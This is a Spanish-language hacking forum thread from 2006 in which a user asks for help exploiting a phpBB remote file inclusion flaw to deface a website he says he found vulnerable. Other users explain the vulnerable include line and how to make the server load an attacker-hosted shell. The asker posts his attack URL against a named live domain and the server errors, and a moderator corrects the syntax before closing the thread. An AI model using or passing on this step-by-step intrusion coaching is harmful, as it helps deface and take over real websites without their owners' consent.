elhacker.net cabecera Bienvenido(a), Visitante. Por favor Ingresar o Registrarse
¿Perdiste tu email de activación?.
 
Inicio Ayuda Buscar Ingresar Registrarse
14 Febrero 2012, 05:23  


+  Foro de elhacker.net
|-+  Seguridad Informática
| |-+  Bugs y Exploits (Moderador: berz3k)
| | |-+  como usar exploit RFI
0 Usuarios y 1 Visitante están viendo este tema.
Páginas: [1] Ir Abajo Respuesta Imprimir
Autor Tema: como usar exploit RFI  (Leído 2,068 veces)
jbhz

Desconectado Desconectado

Mensajes: 27


Ver Perfil
como usar exploit RFI
« en: 26 Septiembre 2006, 01:21 »

pues, andube leyendo varios temas de aqui y de otros foros, tambien 2 videos, y creo que ya vi mi error, pero no se que deba poner ahi

dijamos, yo quiero utilizar este exploit
http://milw0rm.com/exploits/2429

ya encontre una web vulnerable, la cual ya ha sido defaceada, pero el webmaster aun no se presenta (la han defaceado 3 veces seguidas xD)

la sintaxis del exploit es esta:
http://sitename.com/[Script Path]/admin/admin_topic_action_logging.php?setmodules=attach&phpbb_root_path=http://SHELLURL.COM

-ok, la web vulnerable, ya la encontre.
-una shell montada en alguna web, listo, en un servidor gratuito
** aqui lo que me falta, que es el porque creo que no me funciona, es lo que esta en negro: [Script Path]

que tengo que poner aqui?, nunca he defaceado, es mi primera vez, pero ya creo que es lo unico que me falta...


gracias de antemano por su ayuda.
En línea
Ivanchuk


Desconectado Desconectado

Mensajes: 458


LLVM


Ver Perfil WWW
Re: como usar exploit RFI
« Respuesta #1 en: 26 Septiembre 2006, 02:04 »

Haber jbhz, ya te cerraron el post anterior por una pregunta similar. Te voy a dar una manito. Fijate el código vulnerable:
Código:
include($phpbb_root_path . 'language/lang_' . $board_config['default_lang'] . '/lang_admin_topic_action_logging.' . $phpEx);
En php las cadenas de caracteres se concatenan con el ".". Las variables pasadas por url se leen desde el script con el $ antepuesto. Por ejemplo:
Código:
http://www.miweb.com/miscript.php?mivar=valor
Desde miscript.php lees el valor de la variable mivar como $mivar.
Ahora, volviendo al código vulnerable, fijate que se intenta incluir lo que se defina en $phpbb_root_path concatenado con otras cadenas de caracteres que en este caso no interesan. Aca es donde podes hacer que se incluya un archivo remoto y se ejecute en el entorno del servidor.
Entonces si le pasamos una url sabiendo que el script vulnerable es admin_topic_action_logging.php y que tiene que estar definida también la variable $setmodules pues se chequea en el if:
Código:
http://sitename.com/phpbb/admin/admin_topic_action_logging.php?setmodules=attach&phpbb_root_path=http://SHELLURL.COM
Suponiendo que el script está en /phpbb/admin esto haría que pasara el if puesto que definimos $setmodules e intentaría incluir la siguiente cadena:
Código:
http://SHELLURL.COMlanguage/lang_....
Bueno ahora como haces para sacarte de encima todo lo que le concatena?, fácil le pasas phpbb_root_path=http://www.misite.com/mishell.php? de modo que el resto de las cadenas sean parámetros para tu script.
Saludos.
En línea

Sólo quien practica lo absurdo puede lograr lo imposible.

Join us @ http://foro.h-sec.org
jbhz

Desconectado Desconectado

Mensajes: 27


Ver Perfil
Re: como usar exploit RFI
« Respuesta #2 en: 26 Septiembre 2006, 03:07 »

ok, medio entendi, pero intente aplicarla a la pag, pero no encuentro el path. aka el link que estoy intentando usar:
http://www.constructivism.com/phpbb_root_path/admin/admin_topic_action_logging.php?setmodules=attach&phpbb_root_path=http://usuarios.lycos.es/jbhz/xshell.txt$cmd=ls

dame una segunda explicada, jeje, porque aun no entiendo que poner ahi...

segun entendi, tengo que poner, el directorio donde esta el script, pero, segun yo, el script vulnerable esta en /admin/, entonces, dejo asi ".com/admin/admin_topoc_action_logging.php..." y me da el sigiente error:
Código:
Warning: main(): HTTP request failed! HTTP/1.1 404 Not Found in /home/htdocs/web0/html/constructivism/admin/admin_topic_action_logging.php on line 17

Warning: main(http://usuarios.lycos.es/jbhz/xshell.txt$cmd=lslanguage/lang_/lang_admin_topic_action_logging.): failed to open stream: Success in /home/htdocs/web0/html/constructivism/admin/admin_topic_action_logging.php on line 17

Warning: main(): Failed opening 'http://usuarios.lycos.es/jbhz/xshell.txt$cmd=lslanguage/lang_/lang_admin_topic_action_logging.' for inclusion (include_path='.') in /home/htdocs/web0/html/constructivism/admin/admin_topic_action_logging.php on line 17

que estoy haciendo mal?

ah, gracias por responder  ;D
« Última modificación: 26 Septiembre 2006, 03:13 por jbhz » En línea
sirdarckcat
Troll Buena Onda y
CoAdmin
***
Desconectado Desconectado

Mensajes: 6.946


Lavando Platos


Ver Perfil WWW
Re: como usar exploit RFI
« Respuesta #3 en: 26 Septiembre 2006, 06:12 »

1.- no es simbolo de pesos, es simbolo de interrogacion, "?"
2.- se pone la ruta al script vulnerable
3.- si no entiendes el codigo ni te molestes en explotarlo, lee las reglas.
4.- tema CERRADO

Saludos!!
En línea

Páginas: [1] Ir Arriba Respuesta Imprimir 

Ir a:  
Powered by SMF 1.1.16 | SMF © 2006-2008, Simple Machines